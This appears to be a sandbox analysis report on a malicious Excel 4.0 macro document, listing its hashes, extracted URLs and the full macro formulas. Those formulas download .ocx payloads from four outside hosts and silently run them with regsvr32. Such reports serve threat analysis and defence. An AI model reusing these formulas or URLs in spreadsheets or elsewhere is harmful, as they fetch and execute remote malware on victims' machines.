Behavioral task: behavioral1
Sample: 2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.xls
Resource: win7-20220901-en
General
Target: 2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.zip
Size: 36KB
MD5: d95200047eee64603a31c2807ee19076
SHA1: 59d8b56467cf144bceed25df3e65d8a8b29a84e8
SHA256: bd17d6fe4ec17020faab8393681a0d90f42d4553e51e60230da2becf459f8ab2
SHA512: d76cd7b539d5e8c17bf8a13e6ad9a182341574226b4c56d7a701aff344652d02c645cb7c850f4883cb2fe636d824d64f9c21ef74bc8d468ba6fe8298abd6bb56
SSDEEP: 768:24vXY3y8nNtzLW5vGYfEOpPKsd4tP5XTG+qTBxIa5SNnOY4Gczg97Xsz:2KXY3np6eYfEO514tP5DG+c5W4W7M
Malware Config
Extracted URLs:
https://www.centurypapers.com/classes/jNaLifXh9jHzIb/
http://charmslovespells.com/yt-assets/ouRMgGG/
http://chaledooleo.com.br/headers/q7JUE0LzZJQsCQ/
http://www.cesasin.com.ar/administrator/U12P8KYU/
Formulas (Excel 4.0 macro sheet, one formula per cell):
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.centurypapers.com/classes/jNaLifXh9jHzIb/","..\phdg1.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://charmslovespells.com/yt-assets/ouRMgGG/","..\phdg2.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chaledooleo.com.br/headers/q7JUE0LzZJQsCQ/","..\phdg3.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cesasin.com.ar/administrator/U12P8KYU/","..\phdg4.ocx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx")
=RETURN()
Signatures
Files:
2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.zip.zip (Password: infected)
2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.xls (windows office2003)